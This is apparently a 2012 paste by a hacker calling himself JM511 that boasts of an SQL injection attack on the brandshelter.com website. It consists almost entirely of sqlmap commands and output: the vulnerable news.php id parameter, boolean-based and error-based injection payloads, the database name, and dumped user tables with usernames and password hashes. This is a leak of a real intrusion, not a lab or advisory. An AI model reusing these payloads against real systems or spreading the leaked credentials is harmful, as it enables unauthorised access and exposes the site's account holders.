Islam-Hacker

Greeting to Saudi Team-5) 7-9-2012 brandshelter.com

Sep 7th, 2012
  1. Greeting to saudi team ;)
  2. Published by JM511 ;0
  3. Twitter.com/JM511
  4. bbm;21EB3DBB
  5. =============
  6.  
  7. http://www.brandshelter.com/en/
  8. Database: db_wy2c75fus9
  9. Table: users
  10. [1 entry]
  11. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  12. | active | email | groupID | name | password | url | userID | username |
  13. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  14. | y | [email protected] | 1 | New User | d7cf95a11a90b97a121335fda1964e61787010d1 | NULL | 1 | admin |
  15. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  16.  
  17. [23:37:35] [INFO] Table 'db_wy2c75fus9.users' dumped to CSV file '/home/jm511/.sqlmap/output/brandshelter.com/dump/db_wy2c75fus9/users.csv'
  18. [23:37:35] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
  19.  
  20. [*] shutting down at: 23:37:35
  21.  
  22. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp-users --dump
  23.  
  24. sqlmap/0.9 - automatic SQL injection and database takeover tool
  25. http://sqlmap.sourceforge.net
  26.  
  27. [*] starting at: 01:06:20
  28.  
  29. [01:06:20] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
  30. [01:06:20] [INFO] resuming injection data from session file
  31. [01:06:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  32. [01:06:20] [INFO] testing connection to the target url
  33. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  34. ---
  35. Place: GET
  36. Parameter: id
  37. Type: boolean-based blind
  38. Title: AND boolean-based blind - WHERE or HAVING clause
  39. Payload: id=181 AND 7622=7622
  40.  
  41. Type: error-based
  42. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  43. Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  44. ---
  45.  
  46. [01:06:21] [INFO] the back-end DBMS is MySQL
  47.  
  48. web application technology: Apache
  49. back-end DBMS: MySQL 5.0
  50. [01:06:21] [INFO] fetching columns for table '`wp-users`' on database 'db_wy2c75fus9'
  51. [01:06:21] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
  52. [01:06:22] [WARNING] unable to retrieve column names
  53. [01:06:22] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
  54.  
  55. [*] shutting down at: 01:06:22
  56.  
  57. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp_users --dump
  58.  
  59. sqlmap/0.9 - automatic SQL injection and database takeover tool
  60. http://sqlmap.sourceforge.net
  61.  
  62. [*] starting at: 01:06:30
  63.  
  64. [01:06:30] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
  65. [01:06:30] [INFO] resuming injection data from session file
  66. [01:06:30] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  67. [01:06:30] [INFO] testing connection to the target url
  68. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  69. ---
  70. Place: GET
  71. Parameter: id
  72. Type: boolean-based blind
  73. Title: AND boolean-based blind - WHERE or HAVING clause
  74. Payload: id=181 AND 7622=7622
  75.  
  76. Type: error-based
  77. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  78. Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  79. ---
  80.  
  81. [01:06:30] [INFO] the back-end DBMS is MySQL
  82.  
  83. web application technology: Apache
  84. back-end DBMS: MySQL 5.0
  85. [01:06:30] [INFO] fetching columns for table 'wp_users' on database 'db_wy2c75fus9'
  86. [01:06:31] [INFO] the SQL query used returns 10 entries
  87. [01:06:31] [INFO] retrieved: ID
  88. [01:06:32] [INFO] retrieved: bigint(20) unsigned
  89. [01:06:32] [INFO] retrieved: user_login
  90. [01:06:33] [INFO] retrieved: varchar(60)
  91. [01:06:33] [INFO] retrieved: user_pass
  92. [01:06:33] [INFO] retrieved: varchar(64)
  93. [01:06:34] [INFO] retrieved: user_nicename
  94. [01:06:34] [INFO] retrieved: varchar(50)
  95. [01:06:35] [INFO] retrieved: user_email
  96. [01:06:35] [INFO] retrieved: varchar(100)
  97. [01:06:35] [INFO] retrieved: user_url
  98. [01:06:36] [INFO] retrieved: varchar(100)
  99. [01:06:38] [INFO] retrieved: user_registered
  100. [01:06:38] [INFO] retrieved: datetime
  101. [01:06:38] [INFO] retrieved: user_activation_key
  102. [01:06:39] [INFO] retrieved: varchar(60)
  103. [01:06:39] [INFO] retrieved: user_status
  104. [01:06:40] [INFO] retrieved: int(11)
  105. [01:06:41] [INFO] retrieved: display_name
  106. [01:06:42] [INFO] retrieved: varchar(250)
  107. [01:06:42] [INFO] fetching entries for table 'wp_users' on database 'db_wy2c75fus9'
  108. [01:06:42] [INFO] the SQL query used returns 1 entries
  109. [01:06:43] [INFO] retrieved: 0
  110. [01:06:43] [INFO] retrieved: Jensemann
  111. [01:06:44] [INFO] retrieved: Jensemann
  112. [01:06:45] [INFO] retrieved: jensemann
  113. [01:06:45] [INFO] retrieved: 2010-08-19 10:07:50
  114. [01:06:46] [INFO] retrieved: $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1
  115. [01:06:46] [INFO] retrieved: 1
  116. [01:06:46] [INFO] retrieved: [email protected]
  117. Database: db_wy2c75fus9
  118. Table: wp_users
  119. [1 entry]
  120. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  121. | display_name | ID | user_activation_key | user_email | user_login | user_nicename | user_pass | user_registered | user_status | user_url |
  122. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  123. | Jensemann | 1 | None | [email protected] | Jensemann | jensemann | $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1 | 2010-08-19 10:07:50 | 0 | None |
  124. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  125. Database: db_wy2c75fus9
  126. [233 tables]